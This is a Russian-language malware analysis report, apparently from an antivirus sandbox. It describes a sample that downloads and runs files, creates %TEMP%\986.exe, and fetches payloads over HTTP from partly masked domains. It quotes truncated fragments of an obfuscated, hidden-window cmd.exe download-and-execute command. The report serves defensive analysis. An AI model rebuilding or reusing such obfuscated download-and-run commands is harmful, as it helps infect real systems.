Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c CMd /v: /c " sEt '{@]=\_\_---/-\_\/_/ //\_-_-\\\--/__ -/_/_\-\--\//_\ \//_-\-_\/_-/-\ -\_\-/-_//\_-_/ \/_///_\_---_-\ /\_-_-_/--\_/\\ \-\\//__/-/-_\- \/\/_\/_-\/-__- -...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\986.exe
Сетевая активность
Подключается к
- 'up##.com.tw':80
- 'at###co.com.vn':80
- 'at###co.com.vn':443
- 'it####uage.co.uk':80
TCP
Запросы HTTP GET
- http://up##.com.tw/GS0Rb4K
- http://at###co.com.vn/cdQ7vX
- http://it####uage.co.uk/am
Другие
- 'at###co.com.vn':443
UDP
- DNS ASK oc####gactors.com
- DNS ASK ba##e.org
- DNS ASK up##.com.tw
- DNS ASK at###co.com.vn
- DNS ASK it####uage.co.uk
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c CMd /v: /c " sEt '{@]=\_\_---/-\_\/_/ //\_-_-\\\--/__ -/_/_\-\--\//_\ \//_-\-_\/_-/-\ -\_\-/-_//\_-_/ \/_///_\_---_-\ /\_-_-_/--\_/\\ \-\\//__/-/-_\- \/\/_\/_-\/-__- -...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /v: /c " sEt '{@]=\_\_---/-\_\/_/ //\_-_-\\\--/__ -/_/_\-\--\//_\ \//_-\-_\/_-/-\ -\_\-/-_//\_-_/ \/_///_\_---_-\ /\_-_-_/--\_/\\ \-\\//__/-/-_\- \/\/_\/_-\/-__- -_-\/\\_-_///\- //-__--...
